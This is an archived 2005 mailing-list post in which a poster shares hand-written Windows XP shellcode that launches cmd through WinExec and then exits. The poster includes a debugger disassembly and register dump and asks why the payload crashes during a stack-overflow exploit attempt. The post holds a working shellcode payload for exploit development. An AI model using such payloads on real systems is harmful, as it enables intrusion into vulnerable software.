Vulnerability Development mailing list archives

problem to exploit a stack overflow

From: migalo digalo <l.epsilon () gmail com>
Date: Tue, 24 May 2005 14:09:56 +0000

hi all,

ok i tested many test with shell that have not 0xcc and 0xc9 ... i
dicided to test it with my own shellcode (a very simple one)
unsigned char shellcode[] =
"\xC6\x45\xFC\x63"                      /* mov       byte ptr [ebp-4],63h*/
"\xC6\x45\xFD\x6D"                      /* mov        byte ptr [ebp-3],6Dh*/
"\xC6\x45\xFE\x64"                      /*mov         byte ptr [ebp-2],64h*/
"\x33\xC0"                                      /*xor eax,eax*/
"\x50"                                          /*push eax*/
"\x6A\x01 "                                     /*push        1*/     
"\x8D\x45\xFC "                         /*lea         eax,[ebp-4]*/
"\x50"                                          /*push        eax*/
"\xB8\x4D\x11\x86\x7C"          /*mov eax,0x7c86114d (winexec)*/
"\xFF\xD0"                                      /*call eax*/
"\x6A\x01"                                      /*push 1*/
"\xB8\xA2\xCA\x81\x7C"          /*mov eax,0x7c81caa2(ExitProcess)*/
"\xFF\xD0";                                     /*call eax*/

and a degug session give me that:

0012FF34 C6 45 FC 63          mov         byte ptr [ebp-4],63h
0012FF38 C6 45 FD 6D          mov         byte ptr [ebp-3],6Dh
0012FF3C C6 45 FE 64          mov         byte ptr [ebp-2],64h
0012FF40 33 C0                xor         eax,eax
0012FF42 50                   push        eax
0012FF43 6A 01                push        1
0012FF45 20 8D 45 FC 20 50    and         byte ptr [ebp+5020FC45h],cl
0012FF4B B8 4D 11 86 7C       mov         eax,7C86114Dh
0012FF50 FF D0                call        eax
0012FF52 6A 01                push        1
0012FF54 B8 A2 CA 81 7C       mov         eax,7C81CAA2h
0012FF59 FF D0                call        eax
0012FF5B 90                   nop


EAX = 00000001 EBX = 7FFD9000 ECX = 00423AA8
 EDX = 00000000 ESI = 00000000 EDI = 0012FF80
 EIP = 0012FF34 ESP = 0012FF34 EBP = 90909090
 EFL = 00000246 CS = 001B DS = 0023 ES = 0023
 SS = 0023 FS = 003B GS = 0000 OV=0 UP=0 EI=1 PL=0
 ZR=1 AC=0 PE=1 CY=0

 9090908C = ??

 ST0 = +0.00000000000000000e+0000
 ST1 = +0.00000000000000000e+0000
 ST2 = +0.00000000000000000e+0000
 ST3 = +0.00000000000000000e+0000
 ST4 = +0.00000000000000000e+0000
 ST5 = +0.00000000000000000e+0000
 ST6 = +0.00000000000000000e+0000
 ST7 = +0.00000000000000000e+0000 CTRL = 027F
 STAT = 0000 TAGS = FFFF EIP = 00000000 CS = 0000
 DS = 0000 EDO = 00000000

so the access violation happend (this time)  in the beging of the
shellcode !!!? is that a security future in xp sp2 ? or samething
else? can sameone help me to understand this .
thank you

Current thread:

problem to exploit a stack overflow migalo digalo (May 23)
- Re: problem to exploit a stack overflow Valdis . Kletnieks (May 25)
- <Possible follow-ups>
- problem to exploit a stack overflow migalo digalo (May 25)
  - Re: problem to exploit a stack overflow Daniele Milan (May 25)
- Re: problem to exploit a stack overflow 6d79676d61696c6163636f756e74 (May 25)